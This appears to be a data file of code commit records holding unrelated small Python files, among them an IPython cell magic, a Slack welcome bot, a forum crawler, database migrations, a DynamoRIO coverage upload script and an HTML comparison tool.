raise PkcTypeError
def pkc_compress_publickey(publickey):
if type(publickey) is bytes:
return _pkc_compress_publickey(publickey)
else:
raise PkcTypeError
def pkc_verify_signature(publickey, message, signatures):
if (type(publickey) is bytes and type(message) is bytes
and type(signatures) is bytes):
return _pkc_verify_signature(publickey, message, signatures)
else:
raise PkcTypeError
def _pkc_extract_publickey_from_certificate(certificate_bytes):
pass
def _pkc_compress_publickey(publickey_bytes):
pass
def _pkc_verify_signature(publickey_bytes, message_bytes, signatures_bytes):
pass
| mit | Python | |
b716ae64ec574d741386b1dfc18c76e9bddec9a0 | add closure example | dekstop/ipython_extensions,dekstop/ipython_extensions,NunoEdgarGub1/ipython_extensions,minrk/ipython_extensions,danielballan/ipython_extensions,minrk/ipython_extensions,NunoEdgarGub1/ipython_extensions,danielballan/ipython_extensions,danielballan/ipython_extensions,NunoEdgarGub1/ipython_extensions,minrk/ipython_extensions,dekstop/ipython_extensions | closure.py | closure.py | """
%%closure cell magic for running the cell in a function,
reducing pollution of the namespace
%%forget does the same thing, but explicitly deletes new names,
rather than wrapping the cell in a function.
"""
from IPython.utils.text import indent
def closure(line, cell):
"""run the cell in a function, generating a closure
avoids affecting the user's namespace
"""
ip = get_ipython()
func_name = "_closure_magic_f"
block = '\n'.join([
"def %s():" % func_name,
indent(cell),
"%s()" % func_name
])
ip.run_cell(block)
ip.user_ns.pop(func_name, None)
def forget(line, cell):
"""cleanup any new variables defined in the cell
avoids UnboundLocals that might show up in %%closure
changes to existing variables are not affected
"""
ip = get_ipython()
before = set(ip.user_ns.keys())
ip.run_cell(cell)
after = set(ip.user_ns.keys())
for key in after.difference(before):
ip.user_ns.pop(key)
def load_ipython_extension(ip):
mm = ip.magics_manager
mm.register_function(closure, 'cell')
mm.register_function(forget, 'cell')
| bsd-3-clause | Python | |
7d28f97fb16684c58cf9e55bcca213e853741ca4 | Create rmq.py | andymitrich/stepic,andymitrich/stepic | rmq.py | rmq.py | #!/usr/local/bin/python3
from sys import stdin
from math import ceil, log
from decimal import Decimal as d
class RMQ(object):
def __init__(self, numbers):
self.e = []
n = len(numbers)
if (n & (n-1))!=0:
x = ceil(log(n, 2))
nn = 2**x;
while n != nn:
numbers.append(d('Infinity'))
self.size = len()
def build(self):
idx = self.size - 1
while idx > 1:
self.e[idx//2] = min(self.e[idx], self.e[idx+1])
idx -= 2
def min(self, left, right):
pass
def set(self, origin, value):
pass
if __name__ == '__main__':
f = open('input.txt', 'r')
n, m = map(int, f.readline().split())
numbers = list(map(int, f.readline().split()))
# print(n, m)
rmq = RMQ(numbers)
# print(numbers)
for i in range(0, m):
c, x, y = f.readline().split()
if c == 'Min':
rmq.min(x, y)
elif c == 'Set':
rmq.set(x, y)
| mit | Python | |
3d1cef9e56d7fac8a1b89861b7443e4ca660e4a8 | Reduce indentation to avoid PEP8 failures | vmturbo/nova,fnordahl/nova,cloudbau/nova,CEG-FYP-OpenStack/scheduler,vladikr/nova_drafts,yrobla/nova,bigswitch/nova,eharney/nova,KarimAllah/nova,Stavitsky/nova,TwinkleChawla/nova,zzicewind/nova,klmitch/nova,rickerc/nova_audit,belmiromoreira/nova,cloudbase/nova-virtualbox,luogangyi/bcec-nova,Yusuke1987/openstack_template,eneabio/nova,SUSE-Cloud/nova,nikesh-mahalka/nova,fajoy/nova,petrutlucian94/nova_dev,gooddata/openstack-nova,NewpTone/stacklab-nova,Juniper/nova,NoBodyCam/TftpPxeBootBareMetal,sebrandon1/nova,shail2810/nova,usc-isi/extra-specs,orbitfp7/nova,usc-isi/nova,yatinkumbhare/openstack-nova,spring-week-topos/nova-week,yrobla/nova,usc-isi/nova,joker946/nova,usc-isi/extra-specs,apporc/nova,tanglei528/nova,klmitch/nova,cernops/nova,varunarya10/nova_test_latest,salv-orlando/MyRepo,blueboxgroup/nova,BeyondTheClouds/nova,watonyweng/nova,akash1808/nova_test_latest,angdraug/nova,dims/nova,sebrandon1/nova,sridevikoushik31/nova,bgxavier/nova,superstack/nova,ntt-sic/nova,gspilio/nova,NewpTone/stacklab-nova,viggates/nova,adelina-t/nova,maheshp/novatest,varunarya10/nova_test_latest,CiscoSystems/nova,orbitfp7/nova,fajoy/nova,usc-isi/nova,silenceli/nova,psiwczak/openstack,akash1808/nova,mgagne/nova,fnordahl/nova,luogangyi/bcec-nova,NoBodyCam/TftpPxeBootBareMetal,redhat-openstack/nova,NeCTAR-RC/nova,cloudbase/nova,virtualopensystems/nova,mikalstill/nova,cloudbase/nova,CEG-FYP-OpenStack/scheduler,scripnichenko/nova,superstack/nova,DirectXMan12/nova-hacking,edulramirez/nova,houshengbo/nova_vmware_compute_driver,Yuriy-Leonov/nova,Stavitsky/nova,usc-isi/extra-specs,double12gzh/nova,eneabio/nova,plumgrid/plumgrid-nova,imsplitbit/nova,mmnelemane/nova,zhimin711/nova,eonpatapon/nova,ted-gould/nova,aristanetworks/arista-ovs-nova,akash1808/nova_test_latest,aristanetworks/arista-ovs-nova,sileht/deb-openstack-nova,yatinkumbhare/openstack-nova,TieWei/nova,raildo/nova,shootstar/novatest,KarimAllah/nova,Metaswitch/calico-nova,maheshp/novatest,jianghuaw/nova,josephsuh/extra-specs,adelina-t/nova,Juniper/nova,yosshy/nova,whitepages/nova,affo/nova,yrobla/nova,silenceli/nova,bigswitch/nova,whitepages/nova,tudorvio/nova,openstack/nova,phenoxim/nova,CloudServer/nova,joker946/nova,mikalstill/nova,maoy/zknova,bgxavier/nova,citrix-openstack-build/nova,aristanetworks/arista-ovs-nova,dims/nova,gooddata/openstack-nova,devendermishrajio/nova_test_latest,thomasem/nova,NewpTone/stacklab-nova,qwefi/nova,dstroppa/openstack-smartos-nova-grizzly,MountainWei/nova,eayunstack/nova,maoy/zknova,zzicewind/nova,rajalokan/nova,CCI-MOC/nova,mahak/nova,Yusuke1987/openstack_template,saleemjaveds/https-github.com-openstack-nova,kimjaejoong/nova,cloudbase/nova-virtualbox,zhimin711/nova,Juniper/nova,Tehsmash/nova,Francis-Liu/animated-broccoli,phenoxim/nova,JioCloud/nova_test_latest,rahulunair/nova,citrix-openstack-build/nova,badock/nova,petrutlucian94/nova,Triv90/Nova,JianyuWang/nova,sridevikoushik31/nova,apporc/nova,dawnpower/nova,psiwczak/openstack,JioCloud/nova,rajalokan/nova,hanlind/nova,DirectXMan12/nova-hacking,vladikr/nova_drafts,tangfeixiong/nova,eonpatapon/nova,mahak/nova,sileht/deb-openstack-nova,JioCloud/nova_test_latest,leilihh/nova,alexandrucoman/vbox-nova-driver,savi-dev/nova,barnsnake351/nova,jeffrey4l/nova,gspilio/nova,Triv90/Nova,viggates/nova,j-carpentier/nova,klmitch/nova,mikalstill/nova,thomasem/nova,cyx1231st/nova,scripnichenko/nova,josephsuh/extra-specs,sileht/deb-openstack-nova,MountainWei/nova,CCI-MOC/nova,badock/nova,imsplitbit/nova,Metaswitch/calico-nova,leilihh/novaha,russellb/nova,klmitch/nova,shootstar/novatest,JioCloud/nova,rajalokan/nova,ted-gould/nova,BeyondTheClouds/nova,kimjaejoong/nova,rajalokan/nova,rrader/nova-docker-plugin,psiwczak/openstack,CiscoSystems/nova,bclau/nova,watonyweng/nova,maoy/zknova,alvarolopez/nova,devoid/nova,cernops/nova,qwefi/nova,josephsuh/extra-specs,rahulunair/nova,tanglei528/nova,ruslanloman/nova,eneabio/nova,nikesh-mahalka/nova,SUSE-Cloud/nova,vmturbo/nova,jeffrey4l/nova,takeshineshiro/nova,salv-orlando/MyRepo,paulmathews/nova,tianweizhang/nova,dawnpower/nova,devoid/nova,houshengbo/nova_vmware_compute_driver,NoBodyCam/TftpPxeBootBareMetal,jianghuaw/nova,tealover/nova,superstack/nova,rrader/nova-docker-plugin,KarimAllah/nova,felixma/nova,russellb/nova,NeCTAR-RC/nova,berrange/nova,maelnor/nova,mmnelemane/nova,j-carpentier/nova,eharney/nova,sacharya/nova,alvarolopez/nova,LoHChina/nova,spring-week-topos/nova-week,tealover/nova,virtualopensystems/nova,berrange/nova,edulramirez/nova,russellb/nova,plumgrid/plumgrid-nova,raildo/nova,petrutlucian94/nova_dev,projectcalico/calico-nova,ewindisch/nova,vmturbo/nova,DirectXMan12/nova-hacking,felixma/nova,gspilio/nova,double12gzh/nova,devendermishrajio/nova,jianghuaw/nova,Brocade-OpenSource/OpenStack-DNRM-Nova,sebrandon1/nova,akash1808/nova,saleemjaveds/https-github.com-openstack-nova,cloudbau/nova,blueboxgroup/nova,maelnor/nova,rickerc/nova_audit,CloudServer/nova,tangfeixiong/nova,eayunstack/nova,mgagne/nova,Yuriy-Leonov/nova,shahar-stratoscale/nova,hanlind/nova,TieWei/nova,rahulunair/nova,dstroppa/openstack-smartos-nova-grizzly,alaski/nova,mandeepdhami/nova,Juniper/nova,angdraug/nova,jianghuaw/nova,LoHChina/nova,sridevikoushik31/nova,paulmathews/nova,sridevikoushik31/openstack,iuliat/nova,cloudbase/nova,paulmathews/nova,belmiromoreira/nova,JianyuWang/nova,OpenAcademy-OpenStack/nova-scheduler,Francis-Liu/animated-broccoli,bclau/nova,fajoy/nova,openstack/nova,ntt-sic/nova,ewindisch/nova,leilihh/nova,petrutlucian94/nova,sacharya/nova,sridevikoushik31/nova,openstack/nova,redhat-openstack/nova,OpenAcademy-OpenStack/nova-scheduler,devendermishrajio/nova,savi-dev/nova,TwinkleChawla/nova,sridevikoushik31/openstack,sridevikoushik31/openstack,barnsnake351/nova,alaski/nova,BeyondTheClouds/nova,cernops/nova,isyippee/nova,zaina/nova,noironetworks/nova,Triv90/Nova,zaina/nova,tianweizhang/nova,shail2810/nova,mandeepdhami/nova,yosshy/nova,noironetworks/nova,vmturbo/nova,leilihh/novaha,projectcalico/calico-nova,maheshp/novatest,houshengbo/nova_vmware_compute_driver,hanlind/nova,iuliat/nova,devendermishrajio/nova_test_latest,alexandrucoman/vbox-nova-driver,isyippee/nova,takeshineshiro/nova,dstroppa/openstack-smartos-nova-grizzly,tudorvio/nova,salv-orlando/MyRepo,mahak/nova,gooddata/openstack-nova,Tehsmash/nova,ruslanloman/nova,affo/nova,savi-dev/nova,shahar-stratoscale/nova,cyx1231st/nova,gooddata/openstack-nova,Brocade-OpenSource/OpenStack-DNRM-Nova | nova/ipv6/api.py | nova/ipv6/api.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Openstack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import flags
from nova import utils
FLAGS = flags.FLAGS
flags.DEFINE_string('ipv6_backend',
'rfc2462',
'Backend to use for IPv6 generation')
def reset_backend():
global IMPL
IMPL = utils.LazyPluggable(FLAGS['ipv6_backend'],
rfc2462='nova.ipv6.rfc2462',
account_identifier='nova.ipv6.account_identifier')
def to_global(prefix, mac, project_id):
return IMPL.to_global(prefix, mac, project_id)
def to_mac(ipv6_address):
return IMPL.to_mac(ipv6_address)
reset_backend()
| # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Openstack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import flags
from nova import utils
FLAGS = flags.FLAGS
flags.DEFINE_string('ipv6_backend',
'rfc2462',
'Backend to use for IPv6 generation')
def reset_backend():
global IMPL
IMPL = utils.LazyPluggable(FLAGS['ipv6_backend'],
rfc2462='nova.ipv6.rfc2462',
account_identifier='nova.ipv6.account_identifier')
def to_global(prefix, mac, project_id):
return IMPL.to_global(prefix, mac, project_id)
def to_mac(ipv6_address):
return IMPL.to_mac(ipv6_address)
reset_backend()
| apache-2.0 | Python |
72678c437f1b1110fb8a14c78dcdd4c3c8b64157 | Add initial version of bot script | devupin/allie | rtm.py | rtm.py | import time
from slackclient import SlackClient
token = 'kekmao'
sc = SlackClient(token)
team_join_event = 'team_join'
def send_welcome_message(user):
user_id = user['id']
response = sc.api_call('im.open', user=user_id)
try:
dm_channel_id = response['channel']['id']
except (KeyError, ValueError):
print('Shite happened')
return
sc.rtm_send_message(dm_channel_id, 'welcome to devup')
def main():
if sc.rtm_connect():
while True:
for event in sc.rtm_read():
if event.get('type') == team_join_event and (
event['user']['is_bot'] is False):
send_welcome_message(user=event['user'])
time.sleep(1)
else:
print ("Connection Failed, invalid token?")
if __name__ == '__main__':
main()
| mit | Python | |
4c499d366429f68ff29c7a2f93553b06f3697405 | Add missing oslo/__init__.py | varunarya10/oslo.rootwrap | oslo/__init__.py | oslo/__init__.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__import__('pkg_resources').declare_namespace(__name__)
| apache-2.0 | Python | |
5ee021af46f7b6420b5edeac38f5f34f675fa625 | create basic crawler | Nymphet/sexinsex-content-crawler,Nymphet/sexinsex-crawler | crawler.py | crawler.py | # -*- coding:utf-8 -*-
from urllib import request, parse, error
from time import sleep
import re, os
start_tid = '2507213' # change initial url at here
SEXINSEX_URLS_PREFIX = 'http://www.sexinsex.net/forum/'
encoding = 'gbk'
path = os.path.abspath('.')
sleeptime = 0
def generate_url(tid,pid):
return ''.join([SEXINSEX_URLS_PREFIX, 'thread-', str(tid), '-', str(pid), '-1.html'])
def download(url):
r = request.Request(url)
r.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A')
with request.urlopen(r) as f:
with open('%s/html/%s'%(path,parse.quote_plus(url)), 'w') as s:
s.write(f.read().decode(encoding=encoding,errors='ignore'))
class thread():
def __init__(self,tid):
self.tid = tid
self.extracted_pids = []
self.url = generate_url(self.tid, 1)
# extract all pages in a thread, used to extract contents not in the first page
def extract_pids(self):
with open('%s/html/%s'%(path,parse.quote_plus(self.url)), 'r') as f:
p = re.compile(r'''<div class="pages">.*<a href=".*" class="last">(.*)</a>.*</div>''')
for line in f.readlines():
n = p.search(line)
if n:
self.extracted_pids = list(range(1,int(n.group(1))+1))
break
class page():
def __init__(self,tid,pid):
self.tid = tid
self.pid = pid
self.extracted_tids = []
self.url = generate_url(self.tid,self.pid)
# extract all refered tids in this page
def extract_tids(self):
with open('%s/html/%s'%(path,parse.quote_plus(self.url)), 'r') as f:
p = re.compile(r'''<a href="thread-(\d*)-\d*-\d*.html"''')
for line in f.readlines():
n = p.search(line)
if n:
self.extracted_tids.append(n.group(1))
def main():
download(generate_url(start_tid,1))
start_page = page(start_tid,1)
start_page.extract_tids()
print('Extracted tids:')
print(start_page.extracted_tids)
for tid in start_page.extracted_tids:
try:
if sleeptime:
print('sleeping...')
sleep(sleeptime)
print('downloading:',tid)
download(generate_url(tid,1))
except error.HTTPError:
print('HTTPError')
if __name__ == '__main__':
main()
| apache-2.0 | Python | |
5f3a665e4611ae8faf82fcfb2804a0fd9aa84d2b | Create majority_number_iii.py | lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges | lintcode/majority_number_iii/py/majority_number_iii.py | lintcode/majority_number_iii/py/majority_number_iii.py | class Solution:
"""
@param nums: A list of integers
@param k: As described
@return: The majority number
"""
def majorityNumber(self, nums, k):
import collections
ratio = 1.0 / k * len(nums)
counter = collections.Counter(nums)
for num in counter:
count = counter[num]
if count > ratio:
return num
return None
| mit | Python | |
8be862467344b9cf45b567008f10face0ed3ebf3 | Create zhconvert.py for Alpha 1.0.3 | yu-george/Dumpling-Bot | packages/zhconvert.py | packages/zhconvert.py | import requests
_url = 'http://opencc.byvoid.com/convert/'
def toTraditional(text):
# if len(text) > 100:
req = requests.post(_url, data={'text':text,'config':'s2t.json','precise':'0'})
return req.text
# else:
# result = ''
# for segment in [text[i:i+1000] for i in range(0, len(text), 1000)]:
# req = requests.post(_url, data={'text':segment,'config':'s2t.json','precise':'0'})
# result += req.text
# return result
def toSimplified(text):
req = requests.post(_url, data={'text':text,'config':'t2s.json','precise':'0'})
return req.text
| mit | Python | |
22f550dd3499d7d063501a2940a716d42362f6bc | Add missing file. | alphagov/notifications-api,alphagov/notifications-api | migrations/versions/0031_add_manage_team_permission.py | migrations/versions/0031_add_manage_team_permission.py | """empty message
Revision ID: 0031_add_manage_team_permission
Revises: 0030_add_template_permission
Create Date: 2016-02-26 10:33:20.536362
"""
# revision identifiers, used by Alembic.
revision = '0031_add_manage_team_permission'
down_revision = '0030_add_template_permission'
import uuid
from datetime import datetime
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
### commands auto generated by Alembic - please adjust! ###
conn = op.get_bind()
user_services = conn.execute("SELECT * FROM user_to_service").fetchall()
for entry in user_services:
id_ = uuid.uuid4()
created_at = datetime.now().isoformat().replace('T', ' ')
conn.execute((
"INSERT INTO permissions (id, user_id, service_id, permission, created_at)"
" VALUES ('{}', '{}', '{}', 'manage_team', '{}')").format(id_, entry[0], entry[1], created_at))
conn.execute((
"INSERT INTO permissions (id, user_id, service_id, permission, created_at)"
" VALUES ('{}', '{}', '{}', 'view_activity', '{}')").format(id_, entry[0], entry[1], created_at))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
conn = op.get_bind()
conn.execute("DELETE FROM permissions where permission='manage_team'")
conn.execute("DELETE FROM permissions where permission='view_activity'")
### end Alembic commands ### | mit | Python | |
e25a56331c386fc5478c812702ecc6de7ebf100a | Add script to run dynamorio coverage tool on log files. | eunchong/build,eunchong/build,eunchong/build,eunchong/build | scripts/slave/chromium/dynamorio_coverage.py | scripts/slave/chromium/dynamorio_coverage.py | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script for creating coverage.info file with dynamorio bbcov2lcov binary.
"""
import glob
import optparse
import os
import subprocess
import sys
from common import chromium_utils
# Method could be a function
# pylint: disable=R0201
COVERAGE_DIR_POSTFIX = '_coverage'
COVERAGE_INFO = 'coverage.info'
def GetExecutableName(executable):
"""The executable name must be executable plus '.exe' on Windows, or else
just the test name."""
if sys.platform == 'win32':
return executable + '.exe'
return executable
def RunCmd(command, env=None, shell=True):
"""Call a shell command.
Args:
command: the command to run
env: dictionary of environment variables
Returns:
retcode
"""
process = subprocess.Popen(command, shell=shell, env=env)
process.wait()
return process.returncode
def CreateCoverageFileAndUpload(options):
"""Create coverage file with bbcov2lcov binary and upload to www dir."""
# Assert log files exist
log_files = glob.glob(os.path.join(options.dynamorio_log_dir, '*.log'))
if not log_files:
print 'No coverage log files found.'
return 1
if (options.browser_shard_index and
options.test_to_upload in options.sharded_tests):
coverage_info = os.path.join(
options.build_dir, 'coverage_%s.info' % options.browser_shard_index)
else:
coverage_info = os.path.join(options.build_dir, COVERAGE_INFO)
coverage_info = os.path.normpath(coverage_info)
if os.path.isfile(coverage_info):
os.remove(coverage_info)
bbcov2lcov_binary = GetExecutableName(
os.path.join(options.dynamorio_dir, 'tools', 'bin32', 'bbcov2lcov'))
cmd = [
bbcov2lcov_binary,
'--dir', options.dynamorio_log_dir,
'--output', coverage_info]
RunCmd(cmd)
# Delete log files.
log_files = glob.glob(os.path.join(options.dynamorio_log_dir, '*.log'))
for log_file in log_files:
os.remove(log_file)
# Assert coverage.info file exist
if not os.path.isfile(coverage_info):
print 'Failed to create coverage.info file.'
return 1
# Upload coverage file.
cov_dir = options.test_to_upload.replace('_', '') + COVERAGE_DIR_POSTFIX
dest = os.path.join(options.www_dir,
options.platform, options.build_id, cov_dir)
dest = os.path.normpath(dest)
if chromium_utils.IsWindows():
print ('chromium_utils.CopyFileToDir(%s, %s)' %
(coverage_info, dest))
chromium_utils.MaybeMakeDirectory(dest)
chromium_utils.CopyFileToDir(coverage_info, dest)
elif chromium_utils.IsLinux() or chromium_utils.IsMac():
print 'SshCopyFiles(%s, %s, %s)' % (coverage_info, options.host, dest)
chromium_utils.SshMakeDirectory(options.host, dest)
chromium_utils.MakeWorldReadable(coverage_info)
chromium_utils.SshCopyFiles(coverage_info, options.host, dest)
os.unlink(coverage_info)
else:
raise NotImplementedError(
'Platform "%s" is not currently supported.' % sys.platform)
return 0
def main():
option_parser = optparse.OptionParser()
# Required options:
option_parser.add_option('--build-dir',
help='path to main build directory (the parent of '
'the Release or Debug directory)')
option_parser.add_option('--build-id',
help='The build number of the tested build.')
option_parser.add_option('--target',
help='Target directory.')
option_parser.add_option('--platform',
help='Coverage subdir.')
option_parser.add_option('--dynamorio-dir',
help='Path to dynamorio binary.')
option_parser.add_option('--dynamorio-log-dir',
help='Path to dynamorio coverage log files.')
option_parser.add_option('--test-to-upload',
help='Test name.')
chromium_utils.AddPropertiesOptions(option_parser)
options, _ = option_parser.parse_args()
fp = options.factory_properties
options.browser_shard_index = fp.get('browser_shard_index')
options.sharded_tests = fp.get('sharded_tests')
options.host = fp.get('host')
options.www_dir = fp.get('www-dir')
del options.factory_properties
del options.build_properties
return CreateCoverageFileAndUpload(options)
if '__main__' == __name__:
sys.exit(main())
| bsd-3-clause | Python | |
f9d399fb9fa923c68581279085566ba479349903 | test for api export endpoint | kobotoolbox/kobocat,spatialdev/onadata,mainakibui/kobocat,sounay/flaminggo-test,smn/onadata,hnjamba/onaclone,ehealthafrica-ci/onadata,ehealthafrica-ci/onadata,mainakibui/kobocat,qlands/onadata,GeoODK/onadata,awemulya/fieldsight-kobocat,GeoODK/onadata,piqoni/onadata,mainakibui/kobocat,jomolinare/kobocat,hnjamba/onaclone,kobotoolbox/kobocat,kobotoolbox/kobocat,sounay/flaminggo-test,smn/onadata,eHealthAfrica/onadata,jomolinare/kobocat,hnjamba/onaclone,ehealthafrica-ci/onadata,awemulya/fieldsight-kobocat,eHealthAfrica/onadata,spatialdev/onadata,GeoODK/onadata,awemulya/fieldsight-kobocat,mainakibui/kobocat,sounay/flaminggo-test,spatialdev/onadata,piqoni/onadata,eHealthAfrica/onadata,ehealthafrica-ci/onadata,qlands/onadata,hnjamba/onaclone,smn/onadata,GeoODK/onadata,sounay/flaminggo-test,awemulya/fieldsight-kobocat,qlands/onadata,jomolinare/kobocat,qlands/onadata,kobotoolbox/kobocat,piqoni/onadata,spatialdev/onadata,jomolinare/kobocat,smn/onadata,piqoni/onadata | onadata/apps/api/tests/viewsets/test_export_viewset.py | onadata/apps/api/tests/viewsets/test_export_viewset.py | import os
from django.test import RequestFactory
from onadata.apps.api.viewsets.export_viewset import ExportViewSet
from onadata.apps.main.tests.test_base import TestBase
class TestDataViewSet(TestBase):
def setUp(self):
super(self.__class__, self).setUp()
self._create_user_and_login()
self._publish_transportation_form()
self.factory = RequestFactory()
self.extra = {
'HTTP_AUTHORIZATION': 'Token %s' % self.user.auth_token}
def _filename_from_disposition(self, content_disposition):
filename_pos = content_disposition.index('filename=')
self.assertTrue(filename_pos != -1)
return content_disposition[filename_pos + len('filename='):]
def test_form_list(self):
view = ExportViewSet.as_view({
'get': 'list',
})
data = {
'owner': 'http://testserver/api/v1/users/bob',
'public': False,
'public_data': False,
'description': u'',
'downloadable': True,
'is_crowd_form': False,
'allows_sms': False,
'encrypted': False,
'sms_id_string': u'transportation_2011_07_25',
'id_string': u'transportation_2011_07_25',
'title': u'transportation_2011_07_25',
'bamboo_dataset': u''
}
request = self.factory.get('/', **self.extra)
response = view(request)
self.assertEqual(response.status_code, 200)
self.assertDictContainsSubset(data, response.data[0])
def test_form_get(self):
self._make_submissions()
view = ExportViewSet.as_view({
'get': 'retrieve'
})
formid = self.xform.pk
request = self.factory.get('/', **self.extra)
response = view(request)
self.assertEqual(response.status_code, 400)
self.assertEqual(response.data,
{'detail': 'Expected URL keyword argument `owner`.'})
# csv
request = self.factory.get('/', **self.extra)
response = view(request, owner='bob', pk=formid, format='csv')
self.assertEqual(response.status_code, 200)
headers = dict(response.items())
content_disposition = headers['Content-Disposition']
filename = self._filename_from_disposition(content_disposition)
basename, ext = os.path.splitext(filename)
self.assertEqual(headers['Content-Type'], 'application/csv')
self.assertEqual(ext, '.csv')
| bsd-2-clause | Python | |
5a5900a5c0ab1e0ac41469770e3775faf482c21e | write TagField basic | avelino/django-tags | tags/fields.py | tags/fields.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.db.models.fields import CharField
from django.utils.translation import ugettext_lazy as _
from tags.models import Tag
class TagField(CharField):
def __init__(self,
verbose_name=_(u'Tags'),
max_length=4000,
blank=True,
null=True,
help_text=_(u'A comma-separated list of tags.'),
**kwargs):
kwargs['max_length'] = max_length
kwargs['blank'] = blank
kwargs['null'] = null
kwargs['verbose_name'] = verbose_name
kwargs['help_text'] = help_text
self.max_length = max_length
self.blank = blank
self.null = null
self.verbose_name = verbose_name
self.help_text = help_text
CharField.__init__(self, **kwargs)
def pre_save(self, model_instance, add):
str_tags = getattr(model_instance, self.name)
if str_tags:
tags = set(str_tags.split(','))
for tag in tags:
Tag.objects.get_or_create(name=tag)
return ','.join(tags)
return super(TagField, self).pre_save(model_instance, add)
| mit | Python | |
11d2f5e649ef5c5aedec9723894cd29c1d4d81f4 | Add missing migration | fin/froide,fin/froide,fin/froide,fin/froide | froide/document/migrations/0027_alter_document_content_hash.py | froide/document/migrations/0027_alter_document_content_hash.py | # Generated by Django 3.2.4 on 2021-07-07 20:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('document', '0026_auto_20210603_1617'),
]
operations = [
migrations.AlterField(
model_name='document',
name='content_hash',
field=models.CharField(blank=True, editable=False, max_length=40, null=True),
),
]
| mit | Python | |
36e3cb292b24d5940efed635c49bf5bb62007edb | Create __init__.py | sinotradition/meridian | acupoints/__init__.py | acupoints/__init__.py | apache-2.0 | Python | ||
41631175c7aae124f7504f068d9c2f8cf1c9e617 | Add exception to describe errors in configuration processing | Ghostkeeper/Luna | plugins/configuration/configurationtype/configuration_error.py | plugins/configuration/configurationtype/configuration_error.py | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#This software is distributed under the Creative Commons license (CC0) version 1.0. A copy of this license should have been distributed with this software.
#The license can also be read online: <https://creativecommons.org/publicdomain/zero/1.0/>. If this online license differs from the license provided with this software, the license provided with this software should be applied.
"""
Defines a class of exceptions used to denote a false state of being for
configuration.
"""
class ConfigurationError(Exception):
"""
This exception denotes that something went wrong in the configuration.
It is mostly a marker class, but also provides the type of configuration in
which something went wrong.
"""
def __init__(self, message, configuration_type):
"""
Creates a new ConfigurationError.
:param message: The message describing the error that occurred.
:param configuration_type: The configuration type with which the error
occurred.
"""
#Prepend the configuration type before the error message.
super(ConfigurationError, self).__init__("{configuration_type}: {message}".format(configuration_type=configuration_type, message=message))
self.configuration_type = configuration_type #Also store it here for debugging purposes. | cc0-1.0 | Python | |
39fe6bb60e24ac8ac6d9eea60f7dc5b42de25682 | Create PyCompare.py | dadelantado/PyCompare | PyCompare.py | PyCompare.py | import os
from bs4 import BeautifulSoup
def getfiles(path1, path2):
#Load files on root of path1 on files1
for root, dir, names in os.walk(path1):
files1 = names
break #Will break the for to read just the root folder
#Load files on root of path2 on files2
for root, dir, names in os.walk(path2):
files2 = names
break #Will break the for to read just the root folder
#Compares the two list of files and select files with the same name on both paths
interfiles = set(files1).intersection(files2)
#Select just HTML files on mylist
mylist = [ fi for fi in interfiles if fi.endswith('.html')]
print '\nI will check:', len(mylist), 'files in total... HOLD ON!\n'
return mylist
def checkcontent(path1, path2):
#Get files from both paths
mylist = getfiles(path1, path2)
difcontent = 0
diftitles = 0
titles = []
notitles = []
print '='*50
print 'Files With Different Content'
print '='*50
for files in mylist:
#Select files on path1 and add them to the sooup
htmlDoc = open (path1+files, 'r+')
soup1 = BeautifulSoup(htmlDoc.read())
#Select div class description inside div class bodytext
find1 = soup1.select('.bodytext .description')
#Select H3 tags
header1 = soup1.h3
#Select files on path2 and add them to the sopu
htmlDoc = open (path2+files, 'r+')
soup2 = BeautifulSoup(htmlDoc.read())
#Select div class description inside div class bodytext
find2 = soup2.select('.bodytext .description')
#Select H1 tag
header2 = soup2.h1
#Check if the are H1 and H3 tags
if (header2 == None or header1 == None):
notitles.append(files)
#Compares headers
else:
for headers in header1:
h1 = headers
for headers2 in header2:
h3 = headers2
if not h1 == h3:
titles.append(files)
diftitles += 1
#Read lines on HTML files
for lines1 in find1:
l = lines1
for lines2 in find2:
n = lines2
#Compares content
if not l == n:
print files
difcontent += 1
#Print results
print '\n'
print '='*50
print 'Files With No Title'
print '='*50
for lines in notitles:
print lines
print '\n'
print '='*50
print 'Files With Different Titles'
print '='*50
for lines in titles:
print lines
print "\nI've found", difcontent, 'files with different content'
print "I've found", diftitles, 'different titles'
def main():
mypath = "PATH_TO_FOLDER1"
mypath2 = "PATH_TO_FOLDER2"
checkcontent(mypath, mypath2)
if __name__ == "__main__":
main()
| mit | Python | |
